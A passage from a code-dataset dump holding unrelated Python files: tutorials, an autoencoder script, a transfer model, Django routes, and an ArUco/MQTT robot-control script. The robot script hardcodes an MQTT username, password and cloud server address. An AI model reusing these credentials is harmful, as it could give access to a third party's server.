bar\nax.set_zlim([np.min(Z)-1,0])\n\n\n\nplt.show()","sub_path":"bmm/plot_code/plot_3d.py","file_name":"plot_3d.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479071961","text":"\"\"\"\r\nDefinition of TreeNode:\r\nclass TreeNode:\r\n def __init__(self, val):\r\n self.val = val\r\n self.left, self.right = None, None\r\n\"\"\"\r\nclass Solution:\r\n \"\"\"\r\n @param root: The root of binary tree.\r\n @return: An integer\r\n \"\"\" \r\n def maxDepth(self, root):\r\n if root is None:\r\n return 0\r\n \r\n self.depth = 0\r\n self.dfs(root, 1)\r\n return self.depth\r\n \r\n def dfs(self, node, height):\r\n if node.left is None and node.right is None:\r\n self.depth = max(self.depth, height)\r\n return\r\n if node.left:\r\n self.dfs(node.left, height + 1)\r\n if node.right:\r\n self.dfs(node.right, height + 1)","sub_path":"src/MaximumDepthOfBinaryTree.py","file_name":"MaximumDepthOfBinaryTree.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481493648","text":"\nimport os\nos.environ['THEANO_FLAGS'] = 'device=gpu, floatX=float32'\nimport theano\n\nimport numpy as np\nimport numpy.random as npr\n\nimport matplotlib.pyplot as plt\nplt.ion()\n\nimport deepnet\nimport deepnet.autoencoder\nfrom deepnet.autoencoder import Autoencoder, SparseAutoencoder\nfrom deepnet.autoencoder import SparseTrainer, sgd\nfrom deepnet.functions import Linear, NoisyLIFApprox\nimport deepnet.image_tools\n\nfrom skdata.mnist.dataset import MNIST\nmnist = MNIST()\nmnist.meta # accessing this forces data arrays to be built\n\nimages = mnist.arrays['train_images'].astype('float32')\nimages = (images - images.mean()) / images.std()\n\nlabels = np.asarray([m['label'] for m in mnist.meta if m['split'] == 'train'])\nimshape = images.shape[1:]\n\nplt.figure(1)\nplt.clf()\ndeepnet.image_tools.tile(images, rows=5, cols=10)\n\n################################################################################\n### train one layer\n\n# loadfile = None\nloadfile = 'mnist_layer.pkl'\n\nif loadfile is None or not os.path.exists(loadfile):\n\n linear = Linear(slope=1.0)\n noisylif = NoisyLIFApprox(\n tRef=0.02, tauRC=0.06, alpha=10.0, xint=-0.5, amp=1./41, sigma=0.05)\n\n # layer = SparseAutoencoder(visshape=imshape, hidshape=(50,50),\n # rfshape=(9,9), f=noisylif, g=linear)\n layer = SparseAutoencoder(visshape=imshape, hidshape=(40,40),\n rfshape=(9,9), f=noisylif, g=linear)\n\n if loadfile is not None:\n layer.tofile(loadfile)\nelse:\n layer = deepnet.CacheObject.fromfile(loadfile)\n\n################################################################################\ntrain_params = {'rho': 0.01, 'lamb': 25, 'noise_std': 0.2}\ntrainer = SparseTrainer(layer, **train_params)\n\nsgd(trainer, images, nepochs=30, rate=0.05)\n\nif 0:\n ### untied training\n sgd(trainer, images, nepochs=1, rate=0.05)\n layer.untie()\n\n trainer = SparseTrainer(layer, **train_params)\n sgd(trainer, images, nepochs=30, rate=0.05)\n\nresults = layer.compVHV(images)\n\nplt.figure(1)\nplt.clf()\ndeepnet.image_tools.compare([images, results], vlims=(-1,1))\n","sub_path":"examples/mnist_layer.py","file_name":"mnist_layer.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551852910","text":"#newlist = [*expression* for item in iterable if condition == True]\n\ntemps = [221, 234, 
340, 230]\n\nnew_temps = [temp / 10 for temp in temps] #new way using list comprehension\n\n''' new_temps = []\nfor temp in temps:\n new_temps.append(temp / 10)''' #old way using a for loop\n\nprint(new_temps)\n\n\n\n\n\ntemps1 = [221, 234, 340, -9999, 230]\nnew_temps1 = [temp / 10 for temp in temps1 if temp != -9999]\nprint(new_temps1)\n\n\n\n\n\n#if / else list comprehension where if/else goes in between expression and \"for\" statement\ntemps2 = list(temps1)\nnew_temps2 = [temp / 10 if temp != -9999 else 0 for temp in temps2] # -9999 is replaced by 0\nprint(new_temps2)\n","sub_path":"Python Tutorial/python_basics/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"86639866","text":"from decimal import Decimal\nfrom app.core.init import GET_FUNDS, INSERT_TRANSFER\nfrom app.core.models.adapters import xrates\n\n\nclass Transfer:\n @classmethod\n async def get_funds(cls, app, payer, amount: Decimal) -> Decimal:\n \"\"\" Get the remaining balance \"\"\"\n debt_credt = Decimal('0.0000')\n async with app['pg'].acquire() as pgcon:\n async with pgcon.cursor() as c:\n await c.execute(GET_FUNDS, ({'payer_id': payer[1], 'currency': payer[2]}))\n debt_credt = await c.fetchone()\n debt_credt = debt_credt[0]\n debt_credt = debt_credt if debt_credt else Decimal('0.0000')\n return debt_credt\n\n @classmethod\n async def create(cls, app, payer: tuple, payee: tuple, amount_payer: Decimal, description=None) -> Decimal:\n errors = []\n async with app['pg'].acquire() as pgcon:\n async with pgcon.cursor() as c:\n try:\n await c.execute(INSERT_TRANSFER, {\n 'payer_id': payer[1],\n 'payee_id': payee[1],\n 'amount': amount_payer,\n 'currency': payer[2],\n 'description': description})\n if payer[2] != payee[2]:\n # Currency conversion is required\n amount_payee = await Transfer.recalculate_amount(amount_payer, payer[2], payee[2])\n await c.execute(INSERT_TRANSFER, {\n 'payer_id': payer[1],\n 'payee_id': payee[1],\n 'amount': amount_payee,\n 'currency': payee[2],\n 'description': description})\n except Exception as e:\n errors.append({3001: str(e)})\n return errors\n\n @staticmethod\n async def recalculate_amount(amount: Decimal, payer_currency, payee_currency):\n rates = await xrates.parse()\n base = rates.get('base')\n payee_k = 1 if payee_currency == base else rates.get('rates', {}).get(payee_currency)\n payer_k = 1 if payer_currency == base else rates.get('rates', {}).get(payer_currency)\n if payee_k and payer_k:\n amount /= payer_k \n amount *= payee_k\n return amount.quantize(Decimal('1.0000'))","sub_path":"app/core/models/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"211827392","text":"\"\"\"\nThis is the BOBA mosFET Mission Control script. 
\n\n@author: Hélène Verhaeghe\n@Coauthor (Satellite): Jerôme De Saulles \n\"\"\"\n\n#import necessary libraries\nimport cv2 # This is the vision library OpenCV\nimport numpy as np # This is a library for mathematical functions for python (used later)\nimport socket # This library will allow you to communicate over the network\nimport time # This library will allow us to access the system clock for pause/sleep/delay actions\nimport cv2.aruco as aruco #Import the AruCo library\nimport math # Import the math library\nimport itertools as it\nimport logging # This library will offer us a different method to print information on the terminal (better for debugging purposes)\nimport paho.mqtt.client as mqtt # This is the library to do the MQTT communications\nimport random\nimport threading\n\n\n# Initialise variables\nAngleReached = 0 #Field 4 MQTT\nDistanceReached = 0 #Field 5 MQTT\nCommandCount_A = 0 #Keeping track of the number of turning commands sent to BB8\nCommandCount_D = 0 #Keeping track of the number of moving commands sent to BB8\nInPosition = 0\n\nprint(\"CommandCount_A: \"+str(CommandCount_A))\nprint(\"CommandCount_D: \"+str(CommandCount_D))\n\n\n## MQTT Fields - BOBAmosFET\n# Field 1: Angle\n# Field 2: Distance\n# Field 3: Command\n# Field 4: AngleReached\n# Field 5: DistanceReached\n# Field 6: MagneticField \n# Field 7: \n# Field 8: ShipHeight\n\n# Satellite functions\n\ndef rotationMatrixToEulerAngles(R) :\n\n sy = math.sqrt(R[0,0] * R[0,0] + R[1,0] * R[1,0])\n\n singular = sy < 1e-6\n\n if not singular :\n x = math.atan2(R[2,1] , R[2,2])\n y = math.atan2(-R[2,0], sy)\n z = math.atan2(R[1,0], R[0,0])\n else :\n x = math.atan2(-R[1,2], R[1,1])\n y = math.atan2(-R[2,0], sy)\n z = 0\n\n return np.array([x, y, z])\n\ndef second_smallest(numbers):\n m1, m2 = float('inf'), float('inf')\n for x in numbers:\n if x <= m1:\n m1, m2 = x, m1\n elif x < m2:\n m2 = x\n return m2\n\ndef vision():\n\n # Load the camera calibration values\n Camera = np.load('Calibrated_Rig_Camera.npz')\n CM = Camera['CM'] # camera matrix\n dist_coef = Camera['dist_coef'] # distortion coefficients from the camera\n\n aruco_dict = aruco.Dictionary_get(\n aruco.DICT_4X4_50) # Load the aruco dictionary\n pa = aruco.DetectorParameters_create() # Set the detection parameters\n\n # Select the correct camera (0) = front camera, (1) = rear camera\n cap = cv2.VideoCapture(1)\n\n # Set the width and height of the camera to 640x480\n cap.set(3, 640)\n cap.set(4, 480)\n\n # Create two opencv named windows\n cv2.namedWindow(\"frame-image\", cv2.WINDOW_AUTOSIZE)\n\n # Position the window\n cv2.moveWindow(\"frame-image\", 0, 0)\n\n t_end = time.time() + 1\n\n # Execute this continuously\n while time.time() < t_end:\n # Capture current frame from the camera\n ret, frame = cap.read()\n\n # Convert the image from the camera to Gray scale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Run the detection formula\n corners, ids, rP = aruco.detectMarkers(gray, aruco_dict)\n\n # # Count the number of Arucos visible\n # try:\n # IDScount = len(ids)\n # except:\n # IDScount = 0\n\n # Calculate the pose of the markers\n rvecs, tvecs, _objPoints = aruco.estimatePoseSingleMarkers(corners, 53, CM, dist_coef) # <<<< IMPORTANT: number needs changing to width of printed arucos (in mm)\n # Draw the detected markers as an overlay\n out = aruco.drawDetectedMarkers(frame, corners, ids)\n\n # Create Coordinate Storage Arrays\n X = [] #X Coordinate Locations Array\n Y = 
[]\n Z = []\n ID = []\n\n # Run loop if ids are detected\n if ids is not None:\n for i, id in enumerate(ids):\n # Overlay the axis on the image\n out = aruco.drawAxis(out, CM, dist_coef, rvecs[i][0][:], tvecs[i][0][:], 30)\n # Print the tvecs tranformation matrix or Aruco coordinates\n # print(\"X = {:4.1f} Y = {:4.1f} Z = {:4.1f} ID = {:2d}\".format(tvecs[i][0][0], tvecs[i][0][1], tvecs[i][0][2], ids[i][0]))\n X.append(tvecs[i][0][0])\n Y.append(tvecs[i][0][1])\n Z.append(tvecs[i][0][2])\n ID.append(ids[i][0])\n # debugTEST = []\n \n \n # Display the original frame in a window and aruco markers\n cv2.imshow('frame-image', frame)\n\n\n # If the button q is pressed in one of the windows\n if cv2.waitKey(20) & 0xFF == ord('q'):\n # Exit the While loop\n break\n\n # When everything done, release the capture\n cap.release()\n # close all windows\n cv2.destroyAllWindows()\n # # exit the kernel\n # exit(0)\n return X, Y, Z, ID, rvecs\n\ndef initialScan():\n X, Y, Z, ID, rvecs = vision()\n\n # Ensure all coordinates are +ve\n X = [abs(ele) for ele in X]\n Y = [abs(ele) for ele in Y]\n Z = [abs(ele) for ele in Z]\n\n # Combine X(0), Y(1), Z(2) coordinates and ID(3) into P (point) variables\n P = []\n ID_count = len(ID)\n for i in range(ID_count):\n P.append(\n [ID[i], X[i], Y[i], Z[i]]\n )\n # print(P)\n\n # Find the P value which corresponds to the Robot (ID = 0)\n robot_ind = [i for i, el in enumerate(P) if 0 in el][0]\n\n distance = []\n # Count the distances between the robot and the other IDs\n for i in range(ID_count):\n # print(P[i][1], P[robot_ind][1])\n distance.append(\n math.sqrt( ((P[i][1] - P[robot_ind][1]) **2) + ((P[i][2] - P[robot_ind][2]) **2) )\n ) #Compute using 2D Pythagoras\n\n # print(\"Distance vector =\", distance)\n min_distance = second_smallest(distance)\n min_ind = distance.index(min_distance)\n min_ID = P[min_ind][0]\n print(\"The nearest ID is\", min_ID)\n # print(\"The distance to ID\", min_ID, \"from the robot is\", min_distance, \"mm\")\n\n # Store the rvec's for the robot and nearest marker\n rob_rvec = rvecs[robot_ind][0][:]\n marker_rvec = rvecs[min_ind][0][:] # Replace 2 with min_ind when working properly\n output_rvecs = rvecs\n output_rvecs = np.delete(output_rvecs, robot_ind, 0)\n\n # Calculate the relative rotation about the Z axis between the robot ID and nearest ID (beta in notes)\n R_ref_to_cam = cv2.Rodrigues(rob_rvec)[0] #reference to camera\n R_test_to_cam = cv2.Rodrigues(marker_rvec)[0] #test to camera\n R_cam_to_ref = np.transpose(R_ref_to_cam) #inverse of reference to camera\n R_test_to_ref = np.matmul(R_test_to_cam,R_cam_to_ref) #test to reference\n angles_matrix = rotationMatrixToEulerAngles(R_test_to_ref) \n beta = np.degrees(angles_matrix[2])\n beta = 0 - beta\n\n # Calculate the relative angle between the Robot ID axis and the nearest ID location (sigma in notes)\n delta_x = P[robot_ind][1] - P[min_ind][1]\n delta_y = P[min_ind][2] - P[robot_ind][2]\n\n if delta_x > 0:\n if delta_y > 0:\n # upper right\n alpha = np.degrees(math.atan( (delta_x) / (delta_y) ))\n else:\n # lower right\n alpha = np.degrees(math.atan( (-1 * delta_y) / (delta_x) )) + 90\n else:\n if delta_y > 0:\n # upper left\n alpha = np.degrees(math.atan( (delta_y) / (-1 * delta_x) )) + 270\n else:\n # lower left\n alpha = np.degrees(math.atan( (-1 * delta_x) / (-1 * delta_y) )) + 180\n\n # print(\"Alpha =\", alpha, \"degrees\")\n\n # Combine beta and alpha above to calculate the movement direction needed by the robot (sigma in notes)\n angle = alpha - beta\n\n # Convert to 
counter clockwise motion if faster\n if angle > 180:\n angle = angle - 360\n\n # Rewrite the aruco locations with the robot location removed\n # ADD LOGICAL SORTING FUNCTION HERE TO ARRANGE ARUCOS IN ORDER THEY SHOULD BE VISITED\n arucoLocations = P\n del arucoLocations[robot_ind]\n\n return(arucoLocations, output_rvecs, angle, min_distance)\n \ndef BB8_check(target_arucoLocations, target_rvecs, tolerance):\n X, Y, Z, ID, rvecs = vision()\n\n # Ensure all coordinates are +ve\n X = [abs(ele) for ele in X]\n Y = [abs(ele) for ele in Y]\n Z = [abs(ele) for ele in Z]\n\n # Combine X(0), Y(1), Z(2) coordinates and ID(3) into P (point) variables\n P = []\n ID_count = len(ID)\n for i in range(ID_count):\n P.append(\n [ID[i], X[i], Y[i], Z[i]]\n )\n # print(P)\n\n # Find the P value which corresponds to the Robot (ID = 0)\n robot_ind = [i for i, el in enumerate(P) if 0 in el][0]\n robot_loc = P[robot_ind]\n robot_rvec = rvecs[robot_ind][0][:]\n\n distance = []\n # Count the distances between the robot and the target marker\n for i in range(len(target_arucoLocations)):\n # print(P[i][1], P[robot_ind][1])\n distance.append(\n math.sqrt( ((target_arucoLocations[i][1] - robot_loc[1]) **2) + \n ((target_arucoLocations[i][2] - robot_loc[2]) **2) )\n ) #Compute using 2D Pythagoras\n print('Distance i =', distance[i])\n\n\n # Define the acceptable tolerance from the target aruco location (in mm)\n dist_tol = tolerance\n # Logic for calculating either corrected target angle+distance or next target angle+distance\n if distance[0] < dist_tol and len(distance) == 1: # Target reached, final marker\n target_angle = 0\n target_distance = 0\n state = 1\n command = 0\n\n elif distance[0] < dist_tol and len(distance) == 2: # Target reached, move onto next marker\n # Calculate angle to next target aruco\n marker_rvec = target_rvecs[1][0][:] # Define target rvec\n\n # Calculate the relative rotation about the Z axis between the robot ID and nearest ID (beta in notes)\n R_ref_to_cam = cv2.Rodrigues(robot_rvec)[0] #reference to camera\n R_test_to_cam = cv2.Rodrigues(marker_rvec)[0] #test to camera\n R_cam_to_ref = np.transpose(R_ref_to_cam) #inverse of reference to camera\n R_test_to_ref = np.matmul(R_test_to_cam,R_cam_to_ref) #test to reference\n angles_matrix = rotationMatrixToEulerAngles(R_test_to_ref) \n beta = np.degrees(angles_matrix[2])\n beta = 0 - beta\n\n # Calculate the relative angle between the Robot ID axis and the nearest ID location (sigma in notes)\n delta_x = robot_loc[1] - target_arucoLocations[1][1]\n delta_y = target_arucoLocations[1][2] - robot_loc[2]\n if delta_x > 0:\n if delta_y > 0:\n # upper right\n alpha = np.degrees(math.atan( (delta_x) / (delta_y) ))\n else:\n # lower right\n alpha = np.degrees(math.atan( (-1 * delta_y) / (delta_x) )) + 90\n else:\n if delta_y > 0:\n # upper left\n alpha = np.degrees(math.atan( (delta_y) / (-1 * delta_x) )) + 270\n else:\n # lower left\n alpha = np.degrees(math.atan( (-1 * delta_x) / (-1 * delta_y) )) + 180\n # Combine beta and alpha above to calculate the movement direction needed by the robot (sigma in notes)\n target_angle = alpha - beta\n # Convert to counter clockwise motion if faster\n if target_angle > 180:\n target_angle = target_angle - 360\n\n # Output the target distance\n target_distance = distance[1]\n state = 1\n command = 0\n\n elif distance[0] > dist_tol: # Target missed, recalculate angle to current target\n # Calculate angle to current target aruco\n # Calculate angle to next target aruco\n marker_rvec = target_rvecs[0][0][:] # Define 
target rvec\n\n        # Calculate the relative rotation about the Z axis between the robot ID and nearest ID (beta in notes)\n        R_ref_to_cam = cv2.Rodrigues(robot_rvec)[0] #reference to camera\n        R_test_to_cam = cv2.Rodrigues(marker_rvec)[0] #test to camera\n        R_cam_to_ref = np.transpose(R_ref_to_cam) #inverse of reference to camera\n        R_test_to_ref = np.matmul(R_test_to_cam,R_cam_to_ref) #test to reference\n        angles_matrix = rotationMatrixToEulerAngles(R_test_to_ref) \n        beta = np.degrees(angles_matrix[2])\n        beta = 0 - beta\n\n        # Calculate the relative angle between the Robot ID axis and the nearest ID location (sigma in notes)\n        delta_x = robot_loc[1] - target_arucoLocations[0][1]\n        delta_y = target_arucoLocations[0][2] - robot_loc[2]\n        if delta_x > 0:\n            if delta_y > 0:\n                # upper right\n                alpha = np.degrees(math.atan( (delta_x) / (delta_y) ))\n            else:\n                # lower right\n                alpha = np.degrees(math.atan( (-1 * delta_y) / (delta_x) )) + 90\n        else:\n            if delta_y > 0:\n                # upper left\n                alpha = np.degrees(math.atan( (delta_y) / (-1 * delta_x) )) + 270\n            else:\n                # lower left\n                alpha = np.degrees(math.atan( (-1 * delta_x) / (-1 * delta_y) )) + 180\n        # Combine beta and alpha above to calculate the movement direction needed by the robot (sigma in notes)\n        target_angle = alpha - beta\n        # Convert to counter clockwise motion if faster\n        if target_angle > 180:\n            target_angle = target_angle - 360\n\n        # Output the target distance\n        target_distance = distance[0]\n        state = 0\n        command = 1\n\n\n    return(state, target_angle, target_distance, command)\n\n\n# Connect to MQTT Server\n\n# After we connect we subscribe to one (or more) topics in this case the topic number 1\ndef on_connect(client,userdata,flags,rc):\n    print (\"Connected with result code \"+str(rc))\n    client.subscribe(MainTopic+\"4\")\n    client.subscribe(MainTopic+\"5\")\n    \n\n# The callback for when a PUBLISH message is received from the server. I.e. 
when a new value for the topic we subscribed to above updates\ndef on_message(client, userdata, msg):\n global Check\n global InPosition\n global TargetAngle\n global TargetDistance\n global CommandCount_A\n global CommandCount_D\n global Command\n \n print(str(time.time())+\" In topic: \"+msg.topic+\" the value was \"+ str(int(msg.payload.rstrip(b'\\x00'))))\n\n \n data = int(msg.payload.rstrip(b'\\x00'))\n\n if msg.topic == \"BOBAmosFET/4\":\n \n AngleReached = data\n \n if AngleReached == CommandCount_A + 1:\n \n Command = 2 #Satellite Function output\n print(\"Command value change to \"+str(Command))\n\n CommandCount_A = CommandCount_A + 1 # Set to next command index\n print(\"CommandCount_A: \"+str(CommandCount_A))\n\n elif msg.topic == \"BOBAmosFET/5\":\n \n DistanceReached = data\n \n if DistanceReached == CommandCount_D + 1:\n\n Check = 1 \n print(\"Check value change to \"+str(Check))\n\n InPosition, TargetAngle, TargetDistance, Command = BB8_check(target_arucoLocations, target_rvecs, tolerance)\n #print('InPosition, TargetAngle and TargetDistance =', InPosition, TargetAngle, TargetDistance)\n\n \n print(\"InPosition value change to \"+str(InPosition))\n #TargetAngle = 0 #Satellite Function output\n print(\"TargetAngle value change to \"+str(TargetAngle))\n #TargetDistance = 0 #Satellite Function output\n print(\"TargetDistance value change to \"+str(TargetDistance))\n #Command = 3 #Satellite Function output\n print(\"Command value change to \"+str(Command))\n\n CommandCount_D= CommandCount_D + 1 # Set to next command index\n print(\"CommandCount_D: \"+str(CommandCount_D))\n #else:\n #pass \n\n# Create the mqtt client object\nclient = mqtt.Client() \n# Assign the function for the connection event\nclient.on_connect = on_connect\n# Assign the function for the new message event\nclient.on_message = on_message\n\n# Set the username and password\nclient.username_pw_set(\"student\",password=\"smartPass\")\n\n# Connect to the server using a specific port with a timeout delay (in seconds)\nclient.connect(\"ec2-3-10-235-26.eu-west-2.compute.amazonaws.com\",31415,60)\n\n# Create your main topic string. Everything else should be fields with values 1-8\nMainTopic = \"BOBAmosFET/\"\n\n# Start the client\nclient.loop_start() \n\n################################ START ################################\n\n############################# INITIAL MODE ##############################\n\n### Send Command to Mill.Falcon ###\n\n# Generate random number between 0 and 10\nshipHeight = random.randint(0, 10)\n#print(\"Random integer from 0 to 10\")\n#print(\"Random integer: \", shipHeight)\n\n\n# Publish the value (integer) as a string. 
All messages are strings\nclient.publish(MainTopic+\"8\",str(shipHeight))\n# Plot in the terminal what we just did\nprint(\"%s %d\" % (MainTopic+\"8\", shipHeight))\n\n\n### Initial Scan ### \n\n#TargetAngle = 45\n#TargetDistance = 100 \narucoLocations, arucoRvecs, TargetAngle, TargetDistance = initialScan()\n#arucoRvecs = [[[-2.65077743, 0.01517437, 0.0167672 ]],[[ 3.45453988, -0.04192978, 0.42548113]]]\n#arucoLocations = [[11, 27.951521361774212, 88.53147453041412, 682.1787133172342], [13, 107.79970108395187, 105.40086628164487, 742.4444729628245]]\n\nfor i,_ in enumerate(arucoLocations):\n\n    if i < len(arucoLocations)-1:\n\n        target_arucoLocations = [[]]\n        target_arucoLocations[0][:] = arucoLocations[i][:]\n        target_arucoLocations.append(arucoLocations[i+1][:])\n        print('target_arucoLocations =', target_arucoLocations)\n\n        target_rvecs = np.array([[arucoRvecs[i][0][:]],[arucoRvecs[i+1][0][:]] ])\n        # print('target_rvecs =', target_rvecs)\n        tolerance = 50 # Distance tolerance to target aruco (in mm)\n\n    else:\n        target_arucoLocations = [[]]\n        target_arucoLocations[0][:] = arucoLocations[i][:]\n        print('target_arucoLocations =', target_arucoLocations)\n\n        target_rvecs = np.array([[arucoRvecs[i][0][:]] ])\n        # print('target_rvecs =', target_rvecs)\n        tolerance = 50 # Distance tolerance to target aruco (in mm)\n\n    InPosition = 0\n    Check = 1\n    Command = 1\n\n\n    while InPosition < 1:\n\n        ############################# TURNING MODE ##############################\n        if Check == 1:\n\n            print(\"Entered TURNING MODE\")\n            ### Send Command to BB8\n\n            Angle = TargetAngle\n            Distance = 0\n\n            # Publish the value (integer) as a string. All messages are strings\n            client.publish(MainTopic+\"1\",str(Angle))\n            client.publish(MainTopic+\"2\",str(Distance))\n            client.publish(MainTopic+\"3\",str(Command))\n\n            # Plot in the terminal what we just did\n            print(\"%s %d\" % (MainTopic+\"1\", Angle))\n            print(\"%s %d\" % (MainTopic+\"2\", Distance))\n            print(\"%s %d\" % (MainTopic+\"3\", Command))\n\n            Command = 0\n            Check = 0\n            \n            \n            ### 3. Wait for a signal from BB8. Once signal received, go to MOVING MODE\n            while Command == 0:\n                print(\"waiting for a signal from BB8\")\n                pass\n\n        ############################# MOVING MODE ##############################\n        print(\"Entered MOVING MODE\")\n        if Command == 2:\n            ### Send Command to BB8\n            \n            Angle = 0\n            Distance = TargetDistance\n\n            # Publish the value (integer) as a string. All messages are strings\n            client.publish(MainTopic+\"1\",str(Angle))\n            client.publish(MainTopic+\"2\",str(Distance))\n            client.publish(MainTopic+\"3\",str(Command))\n\n            # Plot in the terminal what we just did\n            print(\"%s %d\" % (MainTopic+\"1\", Angle))\n            print(\"%s %d\" % (MainTopic+\"2\", Distance))\n            print(\"%s %d\" % (MainTopic+\"3\", Command))\n\n            Command = 0\n            ### 3. 
Once signal from BB8, position-check function will be triggered within on_message\n \n while Command == 0:\n print(\"waiting for a signal from BB8\")\n pass\n \n\n ############################# DETECTING MODE ##############################\n print(\"Entered DETECTING MODE\")\n\n\n\n\n\nclient.loop_stop()\n# Disconnect\nclient.disconnect()\n","sub_path":"MissionControl/Mechatronic-Project-Satellite/MissionControlTest2_SAT.py","file_name":"MissionControlTest2_SAT.py","file_ext":"py","file_size_in_byte":20670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"521220773","text":"# -*- coding: utf-8 -*-\nimport web\nfrom .models.todos import Todo, TodoTag\ndb = web.extensions.db\n\napp_jslink = ''\napp_desc = '待办列表'\n\ndb.create_all()\n\nurls = [\n \"/todos\", Todo,\n \"/todos/([^/]+)\", Todo,\n \"/tags\", TodoTag,\n \"/tags/([^/]+)\", TodoTag,\n ]\n","sub_path":"todo/appmain.py","file_name":"appmain.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77564602","text":"import csv\nfrom numpy.linalg import norm\nfrom scipy import *\nfrom pylab import plot, show, legend,xlim,ylim,savefig,title,xlabel,ylabel,clf, loglog\nimport os\n\nwdatadir = \"../../../../../data/raw/P1P2P3/Beji/\"\nsdatadir = \"../../../../../data/postprocessing/Beji94FEM/o2/\"\nexp = \"sl\"\nwdir = wdatadir + exp+ \"/\"\nsexpdir = sdatadir + exp + \"/\"\n\nendt = 60\nbegt = 40 \nnts = []\nnwg1s = []\nnwg2s = []\nnwg3s = []\nnwg4s = []\nnwg5s = []\nnwg6s = []\nnwg7s = []\n\ns = wdir + \"NumWaveGauge.txt\"\nwith open(s,'r') as file1:\n readfile = csv.reader(file1, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n j = -1\n for row in readfile: \n if (j >= 0):\n nts.append(float(row[0]))\n nwg1s.append(float(row[1]))\n nwg2s.append(float(row[2]))\n nwg3s.append(float(row[3]))\n nwg4s.append(float(row[4]))\n nwg5s.append(float(row[5]))\n nwg6s.append(float(row[6]))\n nwg7s.append(float(row[7]))\n \n \n j = j + 1\n \n\nets = []\newg1s = []\newg2s = []\newg3s = []\newg4s = []\newg5s = []\newg6s = []\newg7s = [] \ns = wdir + \"WaveGauge.txt\"\nwith open(s,'r') as file1:\n readfile = csv.reader(file1, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n j = -1\n for row in readfile: \n if (j >= 0):\n ets.append(float(row[0]))\n ewg1s.append(float(row[1]))\n ewg2s.append(float(row[2]))\n ewg3s.append(float(row[3]))\n ewg4s.append(float(row[4]))\n ewg5s.append(float(row[5]))\n ewg6s.append(float(row[6]))\n ewg7s.append(float(row[7]))\n \n \n j = j + 1\n\nets0 = ets[1]\n\nendtei = int(endt/ets[1]) + 1 \nbegtei = int(begt/ets[1]) - 1\nets = array(ets[begtei:endtei])\newg1s = array(ewg1s[begtei:endtei])*100\newg2s = array(ewg2s[begtei:endtei])*100\newg3s = array(ewg3s[begtei:endtei])*100\newg4s = array(ewg4s[begtei:endtei])*100\newg5s = array(ewg5s[begtei:endtei])*100\newg6s = array(ewg6s[begtei:endtei])*100\newg7s = array(ewg7s[begtei:endtei])*100\n\n \nExpCom = []\nExpCom.append(ets)\nExpCom.append(ewg1s)\nExpCom.append(ewg2s)\nExpCom.append(ewg3s)\nExpCom.append(ewg4s)\nExpCom.append(ewg5s)\nExpCom.append(ewg6s)\nExpCom.append(ewg7s)\n\n\nmult = int(ets0/nts[1])\nendtni = int(endt/nts[1]) + 1\nbegtni = int(begt/nts[1]) - 1 \n\nnts = array(nts[begtni:endtni:mult])\nnwg1s = (array(nwg1s[begtni:endtni:mult])-0.4)*100\nnwg2s = array(nwg2s[begtni:endtni:mult])*100\nnwg3s = array(nwg3s[begtni:endtni:mult])*100\nnwg4s = array(nwg4s[begtni:endtni:mult])*100\nnwg5s = 
array(nwg5s[begtni:endtni:mult])*100\nnwg6s = array(nwg6s[begtni:endtni:mult])*100\nnwg7s = array(nwg7s[begtni:endtni:mult])*100\n \n \nNumCom = []\nNumCom.append(nts)\nNumCom.append(nwg1s)\nNumCom.append(nwg2s)\nNumCom.append(nwg3s)\nNumCom.append(nwg4s)\nNumCom.append(nwg5s)\nNumCom.append(nwg6s)\nNumCom.append(nwg7s)\n\n\nnc = len(NumCom)\n\nfor j in range(1,nc):\n sdir = sexpdir +\"WaveGauge\" + str(j) + \"/\"\n if not os.path.exists(sdir):\n os.makedirs(sdir)\n nn = len(nts) \n s = sdir + \"Numerical.dat\"\n with open(s,'w') as file1:\n for i in range(nn):\n s =\"%3.8f%5s%1.15f\\n\" %(NumCom[0][i],\" \",NumCom[j][i])\n file1.write(s)\n ne = len(ets) \n s = sdir + \"Experimental.dat\"\n with open(s,'w') as file1:\n for i in range(ne):\n s =\"%3.8f%5s%1.15f\\n\" %(ExpCom[0][i],\" \",ExpCom[j][i])\n file1.write(s)\n ","sub_path":"CODE/postprocessing/readplot/Beji/94CSV2DAT.py","file_name":"94CSV2DAT.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622332001","text":"def swap_case(s):\n a = []\n for i in list(s):\n j = ''\n if i.isupper():\n j = i.lower()\n elif i.islower():\n j = i.upper()\n else:\n a.append(i)\n a.append(j)\n\n\n return ''.join(a)\n\nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)","sub_path":"swap_case.py","file_name":"swap_case.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158421189","text":"from __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom apps.pages import views\n\n\nurlpatterns = [\n url(r'^/?$', views.pages, name='dashboard_pages'),\n url(r'^/add_page/?$', views.add_page, name='dashboard_add_page'),\n url(r'^/edit_page_(?P[0-9]+)/?$', views.edit_page, name='dashboard_edit_page'),\n url(r'^/delete_page_(?P[0-9]+)/?$', views.delete_page, name='dashboard_delete_page'),\n url(r'^/menus/?$', views.menus, 